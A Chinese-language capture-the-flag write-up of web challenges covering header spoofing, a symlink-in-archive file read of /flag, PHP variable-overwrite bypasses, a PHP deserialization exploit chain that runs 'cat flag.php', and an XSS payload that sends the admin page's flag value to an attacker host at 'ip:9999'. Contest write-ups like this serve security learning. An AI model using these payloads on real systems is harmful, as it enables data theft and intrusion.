头头是道
直接就找到了。(这种题出的没啥意义)
warm_up
从本地来并且需要来自jiaran BiliBili Home Page。
用X-Forwarded-For和Referer直接过了就好。
updater
刚开始卡了几分钟,感觉上传的压缩包没一点作用,一直看到哪个readme,还以为是要读取呢。
之后发现有一个README.md文件,以这个文件为突破点,直接传入一个名字为README.md的软连接就好,连接到/flag,然后压缩上传。
ezser
基本可以说是最简单的反序列化了,没有过滤。
exp
<?php
class Fxizenta{
public $b;
public function __construct()
{
$this->b=new Need;
}
}
class Need{
public $cmd;
public function __construct(){
$this->cmd='cat flag.php';
}
}
class girlfriend{
public $a;
public function __construct(){
$this->a=new Fxizenta;
}
}
$a=new girlfriend();
echo urlencode(serialize($a));
EZphp
简简单单的php代码绕过。
只需要知道extract的变量覆盖作用,以及file_get_contents与php://input的搭配作用即可。
babyxss
刚开始本来就已经想到了,但是本能的以为还是盗取cookie,然后伪造身份。之后发现本题根本就没有cookie,然后admin的页面有flag,我直接构造一个payload,可以直接得到flag的值就好。
payload:
<script>new Image().src="http://ip:9999/"+document.getElementById("flag").value;</script>
这个比赛我今天下午七点多才知道,可惜了。(但是比赛web题目有点水)